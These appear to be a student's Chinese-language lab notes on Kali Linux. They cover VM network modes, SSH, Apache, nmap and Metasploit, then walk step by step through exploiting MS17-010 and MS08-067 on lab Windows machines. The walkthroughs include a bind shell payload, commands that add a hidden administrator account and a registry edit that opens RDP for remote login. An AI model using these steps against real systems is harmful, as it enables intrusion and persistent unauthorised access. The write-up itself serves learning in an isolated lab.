学习任务
熟悉kali网络配置,nat模式和桥接模式
熟悉nmap使用
熟悉msfconsole使用
熟练掌握如何利用ms17-010,ms08_067
kali网络配置
资料:07-网络安全-kail linux 网络配置(基础篇) - Jaoany - 博客园 (cnblogs.com)
1.使用ifconfig查看kail网络连接情况,ip地址情况
2.还可以使用ping命令检测网络是否连通,在同一个网段下,(如192.168.1.xxx和192.168.1.xxy)时能互相访问的,如下就可以ping
如果使用NAT模式连接,相当于是模拟的IP地址,虚拟网卡,也能够ping通,和访问外网。
(当没有网络时,可以手动进行配置NAT连接)
常用网络服务ssh
资料:什么是SSH?SSH是如何工作的? - 华为 (huawei.com)
SSH(Secure Shell,安全外壳)是一种网络安全协议,通过加密和认证机制实现安全的访问和文件传输等业务。传统远程登录和文件传输方式,例如Telnet、FTP,使用明文传输数据,存在很多的安全隐患。随着人们对网络安全的重视,这些方式已经慢慢不被接受。SSH协议通过对网络数据进行加密和验证,在不安全的网络环境中提供了安全的网络服务。作为Telnet和其他不安全远程shell协议的安全替代方案,目前SSH协议已经被全世界广泛使用,大多数设备都支持SSH功能。默认情况下,SSH服务器使用端口号22。
通过编辑`/etc/ssh/sshd_config`文件启用PermitRootLogin和PasswordAuthentication,然后重启SSH服务,可以在KaliLinux上配置SSH。此外,MobaXterm等工具可用于安全连接到SSH服务器。
Kali中ssh的配置
1.配置kali ssh文件
2.修改配置文件
sudo nano /etc/ssh/sshd_config
3.启动SSH服务
不知道为什么一直在报错,解决不了
putty远程连接
putty远程链接linux(保姆教程)_putty远程连接linux-CSDN博客
常用网络服务apache
资料:Linux Apache服务详解——Apache服务基础知识_学习linux apache服务总结-CSDN博客
Apache HTTP Server(简称Apache)是Apache软件基金会的一个开放源码的网页服务器,可以在大多数计算机操作系统中运行,由于其跨平台和安全性被广泛使用,是最流行的Web服务器端软件之一。它快速、可靠并且可通过简单的API扩展,将Perl/Python等解释器编译到服务器中。
Apache是一种网站服务程序,所谓网站服务程序,就是作为服务端,处理其他用户客户端发起的http或者https的请求,并给予响应的程序。目前,能够作为网站服务器的程序除了Apache之外还有Nginx、IIS等。
其中,IIS是微软推出的,专门用于windows平台的网站服务程序。Apache和Nginx则是Linux和Windows平台都可以使用。我们常说的LAMP和LNMP架构,其中的A和N就是指的Apache和Nginx。Apache和Nginx相对比,Apache代码量大,算法复杂,属于重量级服务器;Nginx则属于轻量级服务器,代码量少,相对不稳定。
1.apache服务的开启
2.查看apache的运行状态
3.在主机浏览器访问kali ip页面 看是否成功开启
4.浏览器输入kali ip 进行查看 发现成功开启
5.修改apache服务端口 因为apache默认使用80端口,可以使用sudo nano /etc/apache2/apache2.conf修改端口
Nat模式、桥接模式、仅主机模式
资料:
VMware虚拟机三种网络模式:桥接模式,NAT模式,仅主机模式_虚拟机桥接模式是什么意思-CSDN博客
桥接模式?NAT模式?深入原理,一文带你彻底搞清楚!-CSDN博客
桥接模式
桥接模式就是将主机网卡与虚拟的网卡利用虚拟网桥进行通信。类似于把物理主机虚拟为一个交换机,所有桥接设置的虚拟机连接到这个交换机的一个接口上,物理主机也同样插在这个交换机当中,所以所有桥接下的网卡与网卡都是交换模式的,相互可以访问而不干扰。在桥接模式下,虚拟机IP地址需要与主机在同一网段,如果需要联网,则网关与DNS需要与主机网卡一致。
桥接模式下的所有虚拟机都是和主机是在同一网段的,可以把它们看成是"平等"的关系,这就会带来一些麻烦,比如192.168.1段下只有254个主机地址,所以桥接模式下虚拟机和物理的总数不能超过这个数字!
Nat模式
在NAT模式中,主机网卡直接与虚拟NAT设备相连,然后虚拟NAT设备与虚拟DHCP服务器一起连接在虚拟交换机VMnet8上,这样就实现了虚拟机联网。VMware Network Adapter VMnet8网卡是为了实现主机与虚拟机之间的通信。
可见NAT模式下主机更像是虚拟机们的"路由器",通过VMnet8虚拟网卡为虚拟机分发地址。所以虚拟机和主机不再同一网段下,可以理解为主机是虚拟机的"上级",这也就是为什么桥接模式没有VMnet0这个虚拟网卡,因为桥接模式下的虚拟机和主机是"平等"的,共用同一个路由器
VMnet8网卡的作用仅仅是主机与虚拟机之间的通信,访问外网是不通过VMnet8网卡的!NAT模式下的虚拟机时通过真实主机的ip访问外网
仅主机模式
仅主机模式可有看成是NAT模式去除了虚拟NAT设备,然后使用VMware Network Adapter VMnet1虚拟网卡连接VMnet1虚拟交换机来与虚拟机通信的,Host-Only模式将虚拟机与外网隔开,使得虚拟机成为一个独立的系统,只与主机相互通讯。
nmap的使用
资料:nmap详细使用教程_nmap使用教程-CSDN博客
网络扫描神器:Nmap 保姆级教程(附链接)_虚拟机怎么安装nmap-CSDN博客
例子:
1.扫描指定IP地址(ping 扫描)
2.扫描指定IP地址
3.扫描主机的指定端口 nmap xxx.xxx.x.x -pxx
msfconsole使用
【工具使用】——Metasploit(MSF)使用详解(超详细)-CSDN博客
Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。
在MS17_010 漏洞的复现中会演示相关操作
ms17-010(永恒之蓝)
资料:永恒之蓝漏洞复现(ms17-010)-CSDN博客
漏洞介绍
永恒之蓝(ms17-010)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。存在漏洞的主机,只需要开放445端口即可被攻击,获取系统最高权限
漏洞复现
接下来在msf中利用ms17-010漏洞来攻击系统,以熟悉msf工具的使用
复现环境
- 攻击机:kali,192.168.91.128
- 被攻击机:win7,192.168.91.131 关闭防火墙
1.在kali中使用nmap扫描win7,发现445端口开放
2.在kali的终端中打开msfconsole
3.利用search功能搜索ms17-010 搜索到两个模块
扫描模块:auxiliary/admin/smb/ms17_010
攻击模块:exploit/windows/smb/ms17_010_eternalblue
4.使用 模块3 对目标主机进行扫描,我们可以利用options先看一下选项,RHOSTS为目标主机,利用set 命令设置,之后就可以run了。
5.我们发现存在,ms17-010,进行exp,使用模块0,并查看选项,设置RHOSTS,再run
6.得到靶机:shell,使用chcp 65001 解决乱码问题
7.到这里就成功利用了漏洞,可以发现进入了winows系统,下面就可以对靶机进行远程控制了
首先添加一个新用户hhh并将其设成管理员
创建新用户:net user hhh 123456 /add
设成管理员:net localgroup administrators hhh /add
8.利用netstat -ano查看3389端口是否开启,发现没有开启
9.REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f把3389端口打开
10.打开之后输入rdesktop 192.168.140.129:3389
11.选择其他用户,输入刚刚的新用户及其密码
ms08_067
资料:Windows漏洞:MS08-067远程代码执行漏洞复现及深度防御 - 华为云开发者联盟 - 博客园 (cnblogs.com)
漏洞介绍
MS08-067漏洞全称是“Windows Server服务RPC请求缓冲区溢出漏洞”,攻击者利用受害者主机默认开放的SMB服务端口445,发送特殊RPC(Remote Procedure Call,远程过程调用)请求,造成栈缓冲区内存错误,从而被利用实施远程代码执行。MS08-067,也被称为“Conficker”漏洞,是一个影响Windows系统的远程代码执行漏洞。该漏洞允许攻击者利用Microsoft的SMB协议中的漏洞,在目标系统上执行恶意代码。
漏洞原理
MS08-067漏洞是通过MSRPC over SMB通道调用Server程序中的NEtPathCanonicalize函数时触发的。NetPathCanonicalize函数在远程访问其他主机时,会调用NetpwPathCanonicalize函数,对远程访问的路径进行规范化,而在NetpwPathCanonicalize函数中发生了栈缓冲区内存错误(溢出),造成可被利用实施远程代码执行(Remote Code Execution)。后续部分我将分析该漏洞的CFG流程图及漏洞成因。
漏洞复现
首先要确保系统的445端口是开发的以及关闭了系统的防火墙,要保证该电脑系统存在此漏洞
1.首先进入msfconsole
,寻找ms08-067
相关的攻击模块。
2.这里只有一个可用的exploit
模块,use
它。
3.输入options
4.显示出可以被攻击的靶机的操作系统型号
5.set target 5(Windows XP SP2 英文版 (NX))
6.配置options set rhosts 192.168.91.135
7.show payloads
8.set payload generic/shell_bind_tcp
9.show options
8.配置完毕 run/exploit 执行攻击
若有报错信息可尝试以下的方法:
9.在Windows上创建一个名称为mianmian密码为666的用户,并提升为管理员权限 net user mianmian 666 /add && net localgroup administrators mianmian /add
10.开启windows远程登录端口
echo reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f > C:\WINDOWS\system32\3389.bat && call 3389.bat
11.检查3389端口是否打开
12.重新打开一个终端 进行远程登录
rdesktop 192.168.91.135:3389
13.成功登录